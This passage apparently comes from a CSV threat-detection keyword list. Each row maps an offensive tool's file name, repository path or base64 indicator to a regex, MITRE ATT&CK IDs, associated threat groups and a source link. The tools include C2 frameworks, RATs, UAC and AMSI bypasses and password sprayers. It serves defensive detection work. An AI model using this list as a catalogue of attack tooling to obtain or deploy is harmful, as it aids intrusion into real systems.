"*TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADn8UE*",".{0,1000}TVqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADn8UE.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","0","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","61740" "*Tw1sm/PySQLRecon*",".{0,1000}Tw1sm\/PySQLRecon.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","1","N/A","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","61741" "*Tw1sm/RITM*",".{0,1000}Tw1sm\/RITM.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","1","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","61742" "*Tw1sm/spraycharles*",".{0,1000}Tw1sm\/spraycharles.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","1","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","61743" "*twint -g=*km* -o * --csv*",".{0,1000}twint\s\-g\=.{0,1000}km.{0,1000}\s\-o\s.{0,1000}\s\-\-csv.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven 
hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61744" "*twint -u * --since *",".{0,1000}twint\s\-u\s.{0,1000}\s\-\-since\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61745" "*twittor.py*",".{0,1000}twittor\.py.{0,1000}","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","N/A","10","10","771","217","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z","61746" "*twittor-master.zip*",".{0,1000}twittor\-master\.zip.{0,1000}","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","N/A","10","10","771","217","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z","61747" "*TWV0YXNwbG9pdCBSUEMgTG9hZGVy*",".{0,1000}TWV0YXNwbG9pdCBSUEMgTG9hZGVy.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61748" "*Tycx2ry/SweetPotato*",".{0,1000}Tycx2ry\/SweetPotato.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - 
BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","N/A","10","10","241","48","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z","61749" "*tylerdotrar/SigmaPotato*",".{0,1000}tylerdotrar\/SigmaPotato.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","1","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","61750" "*Tylous/Ivy*",".{0,1000}Tylous\/Ivy.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","1","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","61751" "*Tylous/SourcePoint*",".{0,1000}Tylous\/SourcePoint.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","61752" "*Tylous/ZipExec*",".{0,1000}Tylous\/ZipExec.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","61753" "*TypeError/domained*",".{0,1000}TypeError\/domained.{0,1000}","offensive_tool_keyword","domained","A domain name enumeration tool","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Reconnaissance","https://github.com/TypeError/domained","1","1","N/A","N/A","N/A","8","726","157","2021-04-11T09:54:50Z","2017-08-18T00:03:39Z","61754" 
"*Tztufn/Nbobhfnfou/Bvupnbujpo/BntjVujmt*",".{0,1000}Tztufn\/Nbobhfnfou\/Bvupnbujpo\/BntjVujmt.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","N/A","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","61756" "*-u SSARedTeam:s3cr3t*",".{0,1000}\-u\sSSARedTeam\:s3cr3t.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","61757" "*U2h1dGRvd24gL2wgL2Y=*",".{0,1000}U2h1dGRvd24gL2wgL2Y\=.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#base64","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","61758" 
"*U2h1dGRvd24gL3IgL2YgL3QgMDA=*",".{0,1000}U2h1dGRvd24gL3IgL2YgL3QgMDA\=.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#base64","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","61759" "*U2h1dGRvd24gL3MgL2YgL3QgMDA=*",".{0,1000}U2h1dGRvd24gL3MgL2YgL3QgMDA\=.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#base64","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","61760" "*U2hlbGxjb2RlIFBhdGg=*",".{0,1000}U2hlbGxjb2RlIFBhdGg\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","61761" "*U2VhdGJlbHQuZXhl*",".{0,1000}U2VhdGJlbHQuZXhl.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","61762" "*U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl*",".{0,1000}U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","61763" 
"*U3dpdGNoIChvciByZWluaXQpIHRvIExTQVNTIHByb2Nlc3MgIGNvbnRleHQ=*",".{0,1000}U3dpdGNoIChvciByZWluaXQpIHRvIExTQVNTIHByb2Nlc3MgIGNvbnRleHQ\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","61764" "*U3dpdGNoIChvciByZWluaXQpIHRvIExTQVNTIHByb2Nlc3MgIGNvbnRleHQ=*",".{0,1000}U3dpdGNoIChvciByZWluaXQpIHRvIExTQVNTIHByb2Nlc3MgIGNvbnRleHQ\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","61765" "*U3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNNYW5hZ2VkCg==*",".{0,1000}U3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNNYW5hZ2VkCg\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","61766" "*uac fodhelper *",".{0,1000}uac\sfodhelper\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 
framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","61767" "*uac sdclt *",".{0,1000}uac\ssdclt\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","61768" "*uac_bypass*",".{0,1000}uac_bypass.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","61769" "*uac_bypass_bluetooth_win10.lua*",".{0,1000}uac_bypass_bluetooth_win10\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","61770" "*uac_easinvoker.*",".{0,1000}uac_easinvoker\..{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","61771" "*UACBypass -*",".{0,1000}UACBypass\s\-.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","61772" "*UAC-bypass*",".{0,1000}UAC\-bypass.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1","1","0","N/A","N/A","10","","N/A","","","","61773" "*Uacbypass.dll*",".{0,1000}Uacbypass\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","61774" "*UACBypass.My*",".{0,1000}UACBypass\.My.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","61775" "*uacbypass_files*",".{0,1000}uacbypass_files.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","61776" "*UACBypass-BOF*",".{0,1000}UACBypass\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 
- T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","N/A","10","10","133","40","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z","61777" "*UACBypassCMSTP.ps1*",".{0,1000}UACBypassCMSTP\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","61778" "*UACBypassConfig.java*",".{0,1000}UACBypassConfig\.java.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - 
TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","61779" "*UACBypassedService*",".{0,1000}UACBypassedService.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","61780" "*UACBypassedService.exe*",".{0,1000}UACBypassedService\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","61781" "*UACBypassExecuteCMDAsync.py*",".{0,1000}UACBypassExecuteCMDAsync\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
